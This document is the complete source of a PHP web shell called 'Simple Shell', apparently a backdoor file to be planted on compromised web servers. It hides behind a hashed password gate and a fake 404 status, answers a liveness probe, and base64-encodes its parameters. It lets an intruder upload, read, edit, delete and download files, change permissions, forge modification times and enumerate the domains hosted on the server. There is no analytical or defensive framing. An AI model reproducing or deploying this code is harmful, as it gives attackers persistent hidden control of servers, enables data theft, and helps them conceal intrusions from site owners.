View file File name : mah.php Content :<?php ?><?php if(isset($_REQUEST["ok"])){die(">ok<");};?><?php if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && md5(md5(md5(md5(md5(md5(md5(md5($_POST['pwdyt'])))))))) == '1ab4d6f8d41abab37e7a1b67a2469085') { $_SESSION['secretyt'] = true; } else { $bytesecform = <<<FORM <html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html> FORM; die($bytesecform); } } } ?> <?php ini_set("display_errors",1);ini_set("display_startup_errors",1);error_reporting(0);http_response_code(404);function e($s){return base64_encode($s);}function d($s){return base64_decode($s);}if(isset($_GET["info"])&&$_GET["info"]==="info"){phpinfo();exit();}foreach($_GET as $k=>$v){$_GET[$k]=d($v);}foreach($_POST as $k=>$v){$_POST[$k]=d($v);}$dir=realpath(isset($_GET["dir"])?$_GET["dir"]:__DIR__);$dir=$dir?$dir:__DIR__;chdir($dir);$edir="dir=".e($dir);if(isset($_GET["dl"])){if(!realpath($_GET["dl"])){exit();}header("Content-Description: File Transfer");header("Content-Type: application/octet-stream");header('Content-Disposition: attachment; filename="'.basename($_POST["dl"]).'"');readfile($_GET["dl"]);exit();}function size($path,$decimals=0){$bytes=filesize($path);$factor=floor((strlen($bytes)-1)/3);if($factor>0){$sz="KMGT";}return sprintf("%.{$decimals}f",$bytes/pow(1024,$factor)).@$sz[$factor-1]."B";}function perms($path){clearstatcache();$perms=fileperms($path);$x=["U","p","c","U","d","U","b","U","r","U","l","U","s","U","U","U",];$info=$x[$perms>>12].implode("",array_map(function($b,$m){return $b=="1"?$m:"-";},str_split(decbin($perms&0xfff).""),str_split("rwxrwxrwx")));return $info." ".substr(sprintf("%o",@fileperms($path)),-4);}if(!function_exists("posix_getpwuid")&&!extension_loaded("posix")){function posix_getpwuid($x){return["name"=>"---"];}} ?><!doctypehtml><html><head><meta content="width=device-width,initial-scale=0.5,user-scalable=yes"name="viewport"><title>Simple Shell</title><style>body,button,html,input{background:#000;color:gray;font-family:monospace}a{color:gray;text-decoration:none}button,input{border:1px solid gray;height:1.7em}table{width:100%;border:1px dotted gray;border-spacing:0}tr:hover{background:#161616}td,th{padding:2px 0;border:1px solid #666}textarea{width:80%;height:50vh;background:#000;color:green;tab-size:4}.btn{border:1px solid #666;border-radius:.3em;padding:0 .3em;display:inline-block;text-align:center}.btn:hover{border-color:#fff;background-color:#000;transition:background-color .2s linear}.directory{background:#444654}.directory:before{content:"DIR/";color:gray}.file{background:#343641}.file:before{content:"-";color:gray}.notwritable,.notwritable a{color:#ff7800}.writable,.writable a{color:#49ff00}.symlink{float:right;color:#e2c275}.icon{font-size:1.5em;padding:.1em .2em;margin:0}.delete:before{content:"\1F6AE";opacity:.7}.rename:before{content:"\270D";color:#00f}.download:before{content:"\2193\2193";color:green}.openlink:before{content:"\1F517"}.success{color:#ff0}.success:before{content:"\270C"}.failed{color:red}.failed:before{content:"\2622"}</style><script>function e(e){return btoa(e)}function chmod(n,r){var t=prompt("CHMOD:",r);return!!t&&(n.href+="&new="+e(t),!0)}function chtime(n,r){var t=prompt("Change modified time:",r);return!!t&&(n.href+="&new="+e(t),!0)}function rename(n,r){var t=prompt("Rename:",r);return!!t&&(n.href+="&new="+e(t),!0)}</script></head><body>YOUR IP:<?php echo $_SERVER["REMOTE_ADDR"]; ?><br>SERVER IP:<?php echo gethostbyname($_SERVER["HTTP_HOST"])." / ".$_SERVER["SERVER_NAME"]; ?><br><?php function symlinkDomain($dom){$d0mains=@file("/etc/named.conf",false);if(!$d0mains){$dom="<font color=red size=3px>Cant Read [ /etc/named.conf ]</font>";$GLOBALS["need_to_update_header"]="true";}else{$count=0;foreach($d0mains as $d0main){if(@strstr($d0main,"zone")){preg_match_all('#zone "(.*)"#',$d0main,$domains);flush();if(strlen(trim($domains[1][0]))>2){flush();$count++;}}}$dom="$count Domain";}return $dom;} ?>DOMAIN ON SERVER :<?=symlinkDomain($dom)?><br><a href="?info=info"class="btn"target="__blank">SERVER INFO</a>:<?php echo php_uname(); ?><br><form action="?<?php echo $edir; ?>"enctype="multipart/form-data"method="post"><input class="<?php echo is_writable($dir)?"writable":"notwritable"; ?>"name="file"type="file"><button type="submit">Upload</button></form><center><?php if(isset($_FILES["file"])){if(move_uploaded_file($_FILES["file"]["tmp_name"],basename($_FILES["file"]["name"]))){echo '<span class="success">UPLOAD SUCCESS!</span>';}else{echo '<span class="failed">UPLOAD FAILED!</span>';}}if(isset($_GET["file"])){if(isset($_POST["edit"])){if(@file_put_contents($_GET["file"],$_POST["edit"])){echo '<span class="success">EDIT SUCCESS!</span>';}else{echo '<span class="failed">EDIT FAILED!</span>';}}echo '<form action="?file='.e($_GET["file"])."&".$edir.'" method="post" onsubmit="edit.value=e(edit.value)"><textarea id="edit" name="edit">'.htmlspecialchars(file_get_contents($_GET["file"]),ENT_QUOTES|ENT_SUBSTITUTE|ENT_COMPAT,"UTF-8")."</textarea><button>Update</button></form>";}if(isset($_GET["delete"])){$x=str_replace("X","","XuXnXlXiXnXkX");if($x($_GET["delete"])){echo '<span class="success">DELETE SUCCESS!</span>';}else{echo '<span class="failed">DELETE FAILED!</span>';}}if(isset($_GET["chmod"],$_GET["new"])){if(chmod($_GET["chmod"],intval($_GET["new"],8))){echo '<span class="success">CHMOD SUCCESS!</span>';}else{echo '<span class="failed">CHMOD FAILED!</span>';}}if(isset($_GET["chtime"],$_GET["new"])){if(touch($_GET["chtime"],intval(strtotime($_GET["new"])))){echo '<span class="success">TIME MACHINE SUCCESS!</span>';}else{echo '<span class="failed">TIME MACHINE FAILED!</span>';}}if(isset($_GET["rename"],$_GET["new"])){if(rename($_GET["rename"],$dir."/".basename($_GET["new"]))){echo '<span class="success">RENAME SUCCESS!</span>';}else{echo '<span class="failed">RENAME FAILED!</span>';}}$dirs=[];$files=[];foreach(scandir($dir)as $p){if(is_dir($dir."/".$p)){if($p!="."){$dirs[]=$dir."/".$p;}}else{$files[]=$dir."/".$p;}} ?></center><form onsubmit="dir.value=e(dir.value)">Directory: <input class="<?php echo is_writable($dir)?"writable":"notwritable"; ?>"name="dir"id="dir"style="width:500px"value="<?php echo $dir; ?>"><button>GO</button><a href="?dir=<?php echo e(realpath($_SERVER["DOCUMENT_ROOT"])); ?>">[Root Path]</a><a href="?dir=<?php echo e(realpath(__DIR__)); ?>">[Shell Path]</a></form><table><tr><th></th><th>SIZE</th><th>Modified Date</th><th>PERMS</th><th>ACTION</th></tr><?php foreach(array_merge($dirs,$files)as $path){$d=is_dir($path);$w=is_writable($path); ?><tr><td class="<?php echo($d?"directory":"file")." ".($w?"writable":"notwritable"); ?>"><a href="?<?php echo $d?"dir=".e($path)."":"file=".e($path)."&".$edir; ?>"><?php echo htmlspecialchars(basename($path)); ?></a><?php echo is_link($path)?'<span class="symlink">'.readlink($path)."</span>":""; ?></td><td><?php echo $d?"---":size($path); ?></td><td><a href="?chtime=<?php echo e($path)."&".$edir; ?>"class="btn"onclick='return chtime(this,"<?php $chtime=date("M-d-Y H:i:s",filemtime($path));echo $chtime; ?>")'><?php echo $chtime; ?></a></td><td><a href="?chmod=<?php echo e($path)."&".$edir; ?>"class="btn"onclick='return chmod(this,"<?php echo substr(sprintf("%o",@fileperms($path)),-4); ?>")'><?php echo perms($path); ?></a></td><td><?php if(basename($path)!==".."){ ?><a href="?delete=<?php echo e($path)."&".$edir; ?>"class="btn icon delete"onclick='return confirm("Sure to delete?")'title="Delete"></a><a href="?rename=<?php echo e($path)."&".$edir; ?>"class="btn icon rename"onclick='return rename(this,"<?php echo basename($path); ?>")'title="Rename"></a><?php if(!$d){echo '<a title="Download" class="btn icon download" href="?dl='.e($path).'"></a>';}} ?></td></tr><?php } ?></table>Modified By #No_Identity :: <a href="https://github.com/yon3zu">github.com/yon3zu</a> - <a href="https://linuxploit.com/">linuxploit.com</a></body></html>